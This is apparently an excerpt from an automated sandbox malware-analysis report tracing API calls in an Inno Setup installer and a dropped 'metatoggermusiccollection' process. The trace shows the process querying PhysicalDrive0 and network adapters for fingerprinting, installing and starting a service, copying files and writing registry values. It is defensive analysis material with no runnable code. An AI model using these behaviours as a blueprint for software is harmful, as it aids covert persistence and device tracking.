                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: String$AllocByteCharFreeMultiWide
                                                                            • String ID: NIL Interface Exception$Unknown Method
                                                                            • API String ID: 3952431833-1023667238
                                                                            • Opcode ID: ee7019810a410abba18dc0100b1505424b4d32fb8a75e66193451ab1ec3a4339
                                                                            • Instruction ID: b72a7a67dd3218f0a3ff88df64177c3b524228aef2acc9d842c2d5e561a8356e
                                                                            • Opcode Fuzzy Hash: ee7019810a410abba18dc0100b1505424b4d32fb8a75e66193451ab1ec3a4339
                                                                            • Instruction Fuzzy Hash: 281196B0B042489FDB10DFA58D52AAEBBBCEB49704F51407AF500E7681D6799D04CA6A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00490388,?,0049037C,00000000,00490363), ref: 0049032E
                                                                            • CloseHandle.KERNEL32(004903C8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00490388,?,0049037C,00000000), ref: 00490345
                                                                              • Part of subcall function 00490218: GetLastError.KERNEL32(00000000,004902B0,?,?,?,?), ref: 0049023C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                                            • String ID: PI
                                                                            • API String ID: 3798668922-693334235
                                                                            • Opcode ID: 134415cf5764304d7a85ffb8c38d9270039f25a4b86aed9810cf5e7e1bec3561
                                                                            • Instruction ID: 4ee4de2afa315c5d3ad3dcaece3c94236d659781de1454245e5c0a060b0d81db
                                                                            • Opcode Fuzzy Hash: 134415cf5764304d7a85ffb8c38d9270039f25a4b86aed9810cf5e7e1bec3561
                                                                            • Instruction Fuzzy Hash: 380161B1604648AFDF10DBE1DC82E9FBBACEF48714F51007AB904E7291D6785E048A28
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DBB0
                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DBF0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Value$EnumQuery
                                                                            • String ID: Inno Setup: No Icons
                                                                            • API String ID: 1576479698-2016326496
                                                                            • Opcode ID: 6a1cd3006789d3206220bad9523abcb9a55dd1f6e807552613f35ce7fa4689f1
                                                                            • Instruction ID: d0cbb6ba2be1033d78bdf391082c57df80f69eea6018bcbf63f776eb2494bfb3
                                                                            • Opcode Fuzzy Hash: 6a1cd3006789d3206220bad9523abcb9a55dd1f6e807552613f35ce7fa4689f1
                                                                            • Instruction Fuzzy Hash: 5A018431B8933069F73085266D41B6B558C9B46B64F65003BFA41AA3C0D6DCDC44E26A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00455055
                                                                            • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 004550E7
                                                                            Strings
                                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00455081
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)
                                                                            • API String ID: 3850602802-809544686
                                                                            • Opcode ID: 435dea47ab134ee9c233c790085fa77e26bfbdb6ab2bddbea41995d2dc1bd5d4
                                                                            • Instruction ID: 32b2d8f4ecb8be4c0db4edd04b2ba3825a47f3f95082eca841b8c31c2652d296
                                                                            • Opcode Fuzzy Hash: 435dea47ab134ee9c233c790085fa77e26bfbdb6ab2bddbea41995d2dc1bd5d4
                                                                            • Instruction Fuzzy Hash: DF11E5B12042805BD300AB6DDC92F6B7B989BD1708F05803AFA85DF2D2C3794805C7AA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00453D4C: GetCurrentProcess.KERNEL32(00000028), ref: 00453D5B
                                                                              • Part of subcall function 00453D4C: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453D61
                                                                            • SetForegroundWindow.USER32(?), ref: 00491750
                                                                            Strings
                                                                            • Restarting Windows., xrefs: 0049172D
                                                                            • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 0049177B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                            • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                            • API String ID: 3179053593-4147564754
                                                                            • Opcode ID: 37e7ebe001a7a212cde58e6dd306762509c171bb9304b2fdbc30566b2ae3f974
                                                                            • Instruction ID: 8093b4a282ce56f34fca2c4e27c1e82005ec878bca3fe8f1f990b5ec0d5489bc
                                                                            • Opcode Fuzzy Hash: 37e7ebe001a7a212cde58e6dd306762509c171bb9304b2fdbc30566b2ae3f974
                                                                            • Instruction Fuzzy Hash: 9D0188746042866BEB01EBA5E451F9C2BF99754309F5040BBF400672E3DA7C994A871D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00494628,00492509,00000000,0049255E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00470F4E
                                                                              • Part of subcall function 00470DA0: GetLastError.KERNEL32(00000000,00470E8C,?,?,?,00495090,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00470F13,00000001), ref: 00470DC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: File$DeleteErrorLastMove
                                                                            • String ID: DeleteFile$MoveFile
                                                                            • API String ID: 3195829115-139070271
                                                                            • Opcode ID: db37762c13f4d93e70656b80c95a1045161ff295cb5d74cedc87cd46e1c3362d
                                                                            • Instruction ID: 5dbbe8a549c9c9cfc1e93233b16d66570ebc39fdbd933c087ed96991ed48964b
                                                                            • Opcode Fuzzy Hash: db37762c13f4d93e70656b80c95a1045161ff295cb5d74cedc87cd46e1c3362d
                                                                            • Instruction Fuzzy Hash: 3FF04FA0202200D6DA307A6AD5426DA77888F0135DB50C07BF988AB3C6CABD9C4586AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetFocus.USER32(00000000,)I,00000000,004219E4,00000000,00000000,00418568,00000000,00000001,?,?,004618B2,00000001,00000000,00000000,00466C49), ref: 00421CBB
                                                                            • GetFocus.USER32 ref: 00421CC9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Focus
                                                                            • String ID: )I
                                                                            • API String ID: 2734777837-2943873603
                                                                            • Opcode ID: 0a10acb4e0d9c74637569f7b0a18baba00a92d22fcb4ca2a7c7c7526fd4ed3d2
                                                                            • Instruction ID: 6a781247274b35bf802f0d5c88fcb4425cf39f3bc7fec05fcedd95d7989a6849
                                                                            • Opcode Fuzzy Hash: 0a10acb4e0d9c74637569f7b0a18baba00a92d22fcb4ca2a7c7c7526fd4ed3d2
                                                                            • Instruction Fuzzy Hash: ADE09A35B002205ACB1027BA6886BAB21844B64348F58957FB501EB353DD7C8C80068C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(00000000,0049293A), ref: 0040334B
                                                                            • GetCommandLineA.KERNEL32(00000000,0049293A), ref: 00403356
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CommandHandleLineModule
                                                                            • String ID: `6t
                                                                            • API String ID: 2123368496-1776432738
                                                                            • Opcode ID: 016f57816537cb53ee0d22fead2d74d1c6c49dfd7bcaddc35502ccb39479f9fa
                                                                            • Instruction ID: 6c134d8f911d6f86227fe2926812c1aaae8294de158ab29e80a48ca6d96688b2
                                                                            • Opcode Fuzzy Hash: 016f57816537cb53ee0d22fead2d74d1c6c49dfd7bcaddc35502ccb39479f9fa
                                                                            • Instruction Fuzzy Hash: 00C002609052058AD750AFB5D856F152A949795349F80447FB204B61E1D67C82065BDD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastSleep
                                                                            • String ID:
                                                                            • API String ID: 1458359878-0
                                                                            • Opcode ID: 38b3aa0fdc7cf286ae7908819d82f9e16bc075767d4286dc2cbeeb2193c7130c
                                                                            • Instruction ID: 12fd24ff74408153868fcfa923be8ac64c8e349910a1f425c594e0bb2a7a610d
                                                                            • Opcode Fuzzy Hash: 38b3aa0fdc7cf286ae7908819d82f9e16bc075767d4286dc2cbeeb2193c7130c
                                                                            • Instruction Fuzzy Hash: 5CF02B32B04514974F30ADAE98C766FA2DCEA813E7710452BFD08D7303D538DE0986A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage: 7.4%
                                                                            Dynamic/Decrypted Code Coverage: 0%
                                                                            Signature Coverage: 4.7%
                                                                            Total number of Nodes: 448
                                                                            Total number of Limit Nodes: 13
HeapDestroy 2455->2456 2456->2446 2610 402e70 2457->2610 2460 404861 GetStartupInfoA 2467 404972 2460->2467 2470 4048ad 2460->2470 2463 404999 GetStdHandle 2466 4049a7 GetFileType 2463->2466 2463->2467 2464 4049d9 SetHandleCount 2464->2429 2465 402e70 12 API calls 2465->2470 2466->2467 2467->2463 2467->2464 2468 40491e 2468->2467 2469 404940 GetFileType 2468->2469 2469->2468 2470->2465 2470->2467 2470->2468 2472 40472b GetEnvironmentStringsW 2471->2472 2473 40475e 2471->2473 2474 404733 2472->2474 2475 40473f GetEnvironmentStrings 2472->2475 2473->2474 2476 40474f 2473->2476 2478 404777 WideCharToMultiByte 2474->2478 2479 40476b GetEnvironmentStringsW 2474->2479 2475->2476 2477 402fa6 2475->2477 2476->2477 2480 4047f1 GetEnvironmentStrings 2476->2480 2481 4047fd 2476->2481 2494 4044c3 2477->2494 2483 4047ab 2478->2483 2484 4047dd FreeEnvironmentStringsW 2478->2484 2479->2477 2479->2478 2480->2477 2480->2481 2485 402e70 12 API calls 2481->2485 2486 402e70 12 API calls 2483->2486 2484->2477 2492 404818 2485->2492 2487 4047b1 2486->2487 2487->2484 2488 4047ba WideCharToMultiByte 2487->2488 2490 4047d4 2488->2490 2491 4047cb 2488->2491 2489 40482e FreeEnvironmentStringsA 2489->2477 2490->2484 2676 403061 2491->2676 2492->2489 2495 4044d5 2494->2495 2496 4044da GetModuleFileNameA 2494->2496 2706 40583b 2495->2706 2498 4044fd 2496->2498 2499 402e70 12 API calls 2498->2499 2500 40451e 2499->2500 2501 403018 7 API calls 2500->2501 2502 40452e 2500->2502 2501->2502 2502->2433 2504 404417 2503->2504 2506 40441c 2503->2506 2505 40583b 19 API calls 2504->2505 2505->2506 2507 402e70 12 API calls 2506->2507 2508 404449 2507->2508 2509 403018 7 API calls 2508->2509 2512 40445d 2508->2512 2509->2512 2510 403061 7 API calls 2511 4044ac 2510->2511 2511->2435 2513 4044a0 2512->2513 2514 402e70 12 API calls 2512->2514 2515 403018 7 API calls 2512->2515 2513->2510 2514->2512 2515->2512 2517 4043bb 2516->2517 2519 4043c0 2516->2519 2518 40583b 19 API calls 2517->2518 2518->2519 
2519->2438 2521 403046 2520->2521 2522 40304b 2520->2522 2523 404bc0 7 API calls 2521->2523 2524 404bf9 7 API calls 2522->2524 2523->2522 2525 403054 ExitProcess 2524->2525 2730 40417b 2526->2730 2529 40422e 2530 40423a 2529->2530 2531 404363 UnhandledExceptionFilter 2530->2531 2532 40300a 2530->2532 2531->2532 2556 402d50 2533->2556 2536 403155 GetEnvironmentVariableA 2538 403232 2536->2538 2539 403174 2536->2539 2537 40313b 2537->2536 2540 40314d 2537->2540 2538->2540 2561 4030e5 GetModuleHandleA 2538->2561 2542 4031b9 GetModuleFileNameA 2539->2542 2543 4031b1 2539->2543 2540->2450 2540->2451 2542->2543 2543->2538 2558 404d4c 2543->2558 2546 4032d3 2545->2546 2546->2455 2548 403b15 2547->2548 2549 403b1c HeapAlloc 2547->2549 2550 403b39 VirtualAlloc 2548->2550 2549->2550 2551 403b71 2549->2551 2552 403b59 VirtualAlloc 2550->2552 2553 403c2e 2550->2553 2551->2455 2552->2551 2554 403c20 VirtualFree 2552->2554 2553->2551 2555 403c36 HeapFree 2553->2555 2554->2553 2555->2551 2557 402d5c GetVersionExA 2556->2557 2557->2536 2557->2537 2563 404d63 2558->2563 2562 4030fc 2561->2562 2562->2540 2565 404d7b 2563->2565 2567 404dab 2565->2567 2570 405aaa 2565->2570 2566 405aaa 6 API calls 2566->2567 2567->2566 2569 404d5f 2567->2569 2574 4059de 2567->2574 2569->2538 2571 405ac8 2570->2571 2573 405abc 2570->2573 2580 405d6e 2571->2580 2573->2565 2575 405a09 2574->2575 2579 4059ec 2574->2579 2576 405a25 2575->2576 2577 405aaa 6 API calls 2575->2577 2576->2579 2592 405b1f 2576->2592 2577->2576 2579->2567 2581 405d9f GetStringTypeW 2580->2581 2583 405db7 2580->2583 2582 405dbb GetStringTypeA 2581->2582 2581->2583 2582->2583 2587 405ea3 2582->2587 2584 405de2 GetStringTypeA 2583->2584 2586 405e06 2583->2586 2584->2587 2586->2587 2588 405e1c MultiByteToWideChar 2586->2588 2587->2573 2588->2587 2589 405e40 2588->2589 2589->2587 2590 405e7a MultiByteToWideChar 2589->2590 2590->2587 2591 405e93 GetStringTypeW 2590->2591 2591->2587 2593 405b4f LCMapStringW 2592->2593 2595 405b6b 
2592->2595 2594 405b73 LCMapStringA 2593->2594 2593->2595 2594->2595 2597 405cad 2594->2597 2596 405bb4 LCMapStringA 2595->2596 2598 405bd1 2595->2598 2596->2597 2597->2579 2598->2597 2599 405be7 MultiByteToWideChar 2598->2599 2599->2597 2600 405c11 2599->2600 2600->2597 2601 405c47 MultiByteToWideChar 2600->2601 2601->2597 2602 405c60 LCMapStringW 2601->2602 2602->2597 2603 405c7b 2602->2603 2604 405c81 2603->2604 2606 405cc1 2603->2606 2604->2597 2605 405c8f LCMapStringW 2604->2605 2605->2597 2606->2597 2607 405cf9 LCMapStringW 2606->2607 2607->2597 2608 405d11 WideCharToMultiByte 2607->2608 2608->2597 2619 402e82 2610->2619 2613 403018 2614 403021 2613->2614 2615 403026 2613->2615 2656 404bc0 2614->2656 2662 404bf9 2615->2662 2620 402e7f 2619->2620 2622 402e89 2619->2622 2620->2460 2620->2613 2622->2620 2623 402eae 2622->2623 2624 402ed2 2623->2624 2625 402ebd 2623->2625 2627 402f11 HeapAlloc 2624->2627 2631 402ecb 2624->2631 2638 403e00 2624->2638 2625->2631 2632 403653 2625->2632 2628 402f20 2627->2628 2628->2622 2629 402ed0 2629->2622 2631->2627 2631->2628 2631->2629 2633 403685 2632->2633 2634 403724 2633->2634 2636 403733 2633->2636 2645 40395c 2633->2645 2634->2636 2652 403a0d 2634->2652 2636->2631 2639 403e0e 2638->2639 2640 403fcf 2639->2640 2641 403efa VirtualAlloc 2639->2641 2644 403ecb 2639->2644 2642 403b08 5 API calls 2640->2642 2641->2644 2642->2644 2644->2631 2646 40399f HeapAlloc 2645->2646 2647 40396f HeapReAlloc 2645->2647 2649 4039ef 2646->2649 2650 4039c5 VirtualAlloc 2646->2650 2648 40398e 2647->2648 2647->2649 2648->2646 2649->2634 2650->2649 2651 4039df HeapFree 2650->2651 2651->2649 2653 403a1f VirtualAlloc 2652->2653 2655 403a68 2653->2655 2655->2636 2657 404bca 2656->2657 2658 404bf9 7 API calls 2657->2658 2661 404bf7 2657->2661 2659 404be1 2658->2659 2660 404bf9 7 API calls 2659->2660 2660->2661 2661->2615 2664 404c0c 2662->2664 2663 404d23 2666 404d36 GetStdHandle WriteFile 2663->2666 2664->2663 2665 404c4c 2664->2665 2670 40302f 
2664->2670 2667 404c58 GetModuleFileNameA 2665->2667 2665->2670 2666->2670 2668 404c70 2667->2668 2671 405857 2668->2671 2670->2460 2672 405864 LoadLibraryA 2671->2672 2674 4058a6 2671->2674 2673 405875 GetProcAddress 2672->2673 2672->2674 2673->2674 2675 40588c GetProcAddress GetProcAddress 2673->2675 2674->2670 2675->2674 2677 403089 2676->2677 2678 40306d 2676->2678 2677->2490 2679 403077 2678->2679 2680 40308d 2678->2680 2682 4030b9 HeapFree 2679->2682 2683 403083 2679->2683 2681 4030b8 2680->2681 2684 4030a7 2680->2684 2681->2682 2682->2677 2687 40332a 2683->2687 2693 403dbb 2684->2693 2688 403368 2687->2688 2692 40361e 2687->2692 2689 403564 VirtualFree 2688->2689 2688->2692 2690 4035c8 2689->2690 2691 4035d7 VirtualFree HeapFree 2690->2691 2690->2692 2691->2692 2692->2677 2694 403de8 2693->2694 2695 403dfe 2693->2695 2694->2695 2697 403ca2 2694->2697 2695->2677 2700 403caf 2697->2700 2698 403d5f 2698->2695 2699 403cd0 VirtualFree 2699->2700 2700->2698 2700->2699 2702 403c4c VirtualFree 2700->2702 2703 403c69 2702->2703 2704 403c99 2703->2704 2705 403c79 HeapFree 2703->2705 2704->2700 2705->2700 2707 405844 2706->2707 2708 40584b 2706->2708 2710 405477 2707->2710 2708->2496 2717 405610 2710->2717 2712 405604 2712->2708 2715 4054ba GetCPInfo 2716 4054ce 2715->2716 2716->2712 2722 4056b6 GetCPInfo 2716->2722 2718 405630 2717->2718 2719 405620 GetOEMCP 2717->2719 2720 405488 2718->2720 2721 405635 GetACP 2718->2721 2719->2718 2720->2712 2720->2715 2720->2716 2721->2720 2723 4056d9 2722->2723 2729 4057a1 2722->2729 2724 405d6e 6 API calls 2723->2724 2725 405755 2724->2725 2726 405b1f 9 API calls 2725->2726 2727 405779 2726->2727 2728 405b1f 9 API calls 2727->2728 2728->2729 2729->2712 2731 404187 GetCurrentProcess TerminateProcess 2730->2731 2732 404198 2730->2732 2731->2732 2733 402ff9 2732->2733 2734 404202 ExitProcess 2732->2734 2733->2529 2854 402322 2855 402324 Sleep 2854->2855 2857 40b93b 2855->2857 2735 40b323 OpenSCManagerA 2858 402223 2860 40b055 
2858->2860 2859 4022ba 2860->2859 2862 401f64 FindResourceA 2860->2862 2863 401f86 GetLastError SizeofResource 2862->2863 2864 401f9f 2862->2864 2863->2864 2865 401fa6 LoadResource LockResource GlobalAlloc 2863->2865 2864->2859 2866 401fd2 2865->2866 2867 401ffb GetTickCount 2866->2867 2869 402005 GlobalAlloc 2867->2869 2869->2864 2739 4028a6 RegCreateKeyExA 2870 40222b 2871 40b4bb GetLastError 2870->2871 2943 4021ae 2944 402514 wsprintfA 2943->2944 2873 405c33 2874 405c42 2873->2874 2875 405c47 MultiByteToWideChar 2874->2875 2876 405cad 2874->2876 2875->2876 2877 405c60 LCMapStringW 2875->2877 2877->2876 2878 405c7b 2877->2878 2879 405c81 2878->2879 2881 405cc1 2878->2881 2879->2876 2880 405c8f LCMapStringW 2879->2880 2880->2876 2881->2876 2882 405cf9 LCMapStringW 2881->2882 2882->2876 2883 405d11 WideCharToMultiByte 2882->2883 2883->2876 2946 4023b3 RegisterServiceCtrlHandlerA 2947 4023d6 2946->2947 2948 4024cc 2946->2948 2949 4023e4 SetServiceStatus GetLastError CreateEventA 2947->2949 2950 40245d SetServiceStatus CreateThread WaitForSingleObject CloseHandle 2949->2950 2951 40243e GetLastError 2949->2951 2952 4024c3 SetServiceStatus 2950->2952 2951->2952 2952->2948 2953 4025b8 CloseHandle 2954 40b8a2 ExitProcess 2953->2954 2955 4026ba 2956 40b0d5 RegSetValueExA 2955->2956 2958 40bba1 RegCloseKey 2956->2958 2959 40bba7 2958->2959 2885 40b33b 2886 40b344 CopyFileA 2885->2886 2888 402661 2886->2888 2888->2888 2764 40223c GetCommandLineW 2765 40b040 CommandLineToArgvW 2764->2765 2766 40b942 GetLocalTime 2765->2766 2769 401f27 2766->2769 2770 401f3c 2769->2770 2773 401a1d 2770->2773 2772 401f45 2774 401a2c 2773->2774 2779 401a4f CreateFileA 2774->2779 2778 401a3e 2778->2772 2780 401a35 2779->2780 2786 401a7d 2779->2786 2787 401b4b LoadLibraryA 2780->2787 2781 401a98 DeviceIoControl 2781->2786 2783 401b3a FindCloseChangeNotification 2783->2780 2784 401b0e GetLastError 2784->2783 2784->2786 2786->2781 2786->2783 2786->2784 2796 402cb6 2786->2796 2799 402ca8 2786->2799 
2788 401c21 2787->2788 2789 401b6e GetProcAddress 2787->2789 2788->2778 2790 401c18 FreeLibrary 2789->2790 2792 401b85 2789->2792 2790->2788 2791 401b95 GetAdaptersInfo 2791->2792 2792->2791 2793 402cb6 7 API calls 2792->2793 2794 401c15 2792->2794 2795 402ca8 12 API calls 2792->2795 2793->2792 2794->2790 2795->2792 2797 403061 7 API calls 2796->2797 2798 402cbf 2797->2798 2798->2786 2800 402e82 12 API calls 2799->2800 2801 402cb3 2800->2801 2801->2786

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                            • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                            • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                            • API String ID: 514930453-3667123677
                                                                            • Opcode ID: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                            • Instruction ID: 989bf52404031a28807fba390b80e1364536d7dfce6c2044dfeb9dc774225594
                                                                            • Opcode Fuzzy Hash: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                            • Instruction Fuzzy Hash: F521B870944209AFEF21DF65C9447EF7BB8EF41344F1440BAE504B22E1E7789985CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 401a4f-401b4a (rendered graph image with Executed / Not Executed legend; the textual edge list is not reproduced)
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                            • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                            • GetLastError.KERNEL32 ref: 00401B0E
                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                            • String ID: \\.\PhysicalDrive0
                                                                            • API String ID: 3786717961-1180397377
                                                                            • Opcode ID: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                            • Instruction ID: 4be7cd3f819721d39b4e681a90ac86abf8c5b8a7a35c169795375fcfafce56b7
                                                                            • Opcode Fuzzy Hash: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                            • Instruction Fuzzy Hash: 5E31AB71D00218EADB21EFA5CD809EFBBB8FF41750F20407AE514B22A0E3785E41CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 402345-4026a8 (rendered graph image with Executed / Not Executed legend; the textual edge list is not reproduced)
                                                                            APIs
                                                                            • StartServiceCtrlDispatcherA.ADVAPI32 ref: 004026A1
                                                                            Memory Dump Source
